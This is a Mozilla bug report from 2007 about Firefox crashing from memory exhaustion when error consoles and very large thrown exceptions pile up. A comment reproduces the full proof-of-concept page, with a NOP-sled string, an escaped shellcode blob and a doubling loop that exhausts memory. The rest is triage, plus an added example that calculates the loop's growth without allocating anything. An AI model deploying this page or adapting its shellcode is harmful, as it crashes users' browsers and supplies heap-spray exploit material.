Closed
Bug 390090
Opened 18 years ago
Closed 18 years ago
Firefox Memory Exhaustion DoS with multiple Error Consoles
Categories
(Toolkit Graveyard :: Error Console, defect)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 243170
People
(Reporter: sirdarckcat, Unassigned)
Details
(Keywords: crash)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
While popping a lot of Error Consoles, when throwing very large exceptions through "throw 'string'", Firefox crashes.
Reproducible: Always
Steps to Reproduce:
1. Go to the PoC website. Be aware that the PoC may crash your browser.
Actual Results:
After 2 minutes, "Memory Limit Reached" Error, and NULL Pointer Exception some seconds after that.
Expected Results:
"out of memory" exception at the console.
After 2 minutes, "Memory Limit Reached" Error, and a NULL Pointer Exception some seconds after that.
I thought of addressing this bug as critical, because "the software crashes and/or hangs", but I don't think it's really "critical", so I left it as a Major bug.
Comment 1•18 years ago
confirmed in
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 2•18 years ago
And it crashes Internet Explorer too :-)
The content of that page is:
<html>
<head>
<title>Firefox [Error Console+Throw] Denial of Service (by sirdarckcat)</title>
<style>
iframe{height: 1px; width: 1px; border: 0px;}
</style>
</head>
<body>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<iframe src="javascript:"></iframe><iframe src="javascript:"></iframe><iframe src="javascript:"></iframe>
<script language="JavaScript">
var m=/*nop + nop*/unescape("%u9090");
//shellcode never gets executed.. this was just for testing.., the code of the shellcode is a simple >> calc.exe << PoC
var s=/*shellcode*/unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
m=m+m;
document.write('<script>throw m+s;</scr'+'ipt>');
}
</script>
</body>
</html>
Comment 3•18 years ago
We removed the ability for web sites to open the error console in bug 243170 on trunk only (for Firefox 3).
You're clearly hitting some kind of out-of-memory crash bug, but we have plenty of OOM crash bug reports, and this one is hard to reproduce even on branch, so I don't think it warrants special investigation. If you can figure out what the OOM crash bug is by looking at a stack trace for the crash, please file another bug report (preferably with a patch).
Severity: major → critical
Status: NEW → RESOLVED
Closed: 18 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Comment 4•18 years ago
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a7pre) Gecko/2007072905 Minefield/3.0a7pre ID:2007072905
The URL makes my Firefox take a silly amount of memory and effectively hang too.
Comment 5•18 years ago
The script at the bottom looks like it's trying to fill up memory, so that's not too surprising.
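The growth behind the observation in Comment 5, worked through as an added example (not code from the bug report or from Mozilla): it models the `m=m+m` loop from the posted page with BigInt arithmetic and allocates nothing. The 2-byte character size, the 2 GiB budget and the length used for `s` are assumptions.

```javascript
// Added example: size model of the PoC's doubling loop. Computes lengths only.
function modelDoublingLoop({ passes, seedChars, suffixChars, bytesPerChar, budgetBytes }) {
  let mChars = seedChars;       // length of m before the loop starts
  let firstOverBudget = null;   // first pass whose thrown string exceeds the budget
  const rows = [];              // per-pass sizes, up to and including that pass

  for (let i = 0; i < passes; i++) {
    mChars *= 2n;                                              // m = m + m
    const thrownBytes = (mChars + suffixChars) * bytesPerChar; // throw m + s
    if (firstOverBudget === null && thrownBytes > budgetBytes) {
      firstOverBudget = i;
    }
    if (firstOverBudget === null || i === firstOverBudget) {
      rows.push({ pass: i, mChars, thrownBytes });
    }
  }
  return { firstOverBudget, rows, finalChars: mChars };
}

const result = modelDoublingLoop({
  passes: 64,             // loop bound used on the posted page
  seedChars: 1n,          // unescape("%u9090") yields one UTF-16 code unit
  suffixChars: 100n,      // constructed stand-in for the length of s
  bytesPerChar: 2n,       // assumption: strings stored as 16-bit code units
  budgetBytes: 2n ** 31n, // assumption: 2 GiB of user address space
});

// Show the last few passes before the budget is exceeded.
for (const r of result.rows.slice(-4)) {
  console.log(`pass ${r.pass}: m = ${r.mChars} chars, thrown string = ${r.thrownBytes} bytes`);
}
console.log(`budget exceeded on pass ${result.firstOverBudget} of 64`);
console.log(`m would reach ${result.finalChars} chars if all 64 passes completed`);
```

Under these assumptions a single thrown string outgrows the address space less than halfway through the loop, so the remaining passes can never run and the process's out-of-memory handling decides the outcome.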
Updated•17 years ago
Product: Firefox → Toolkit
Updated•9 years ago
Product: Toolkit → Toolkit Graveyard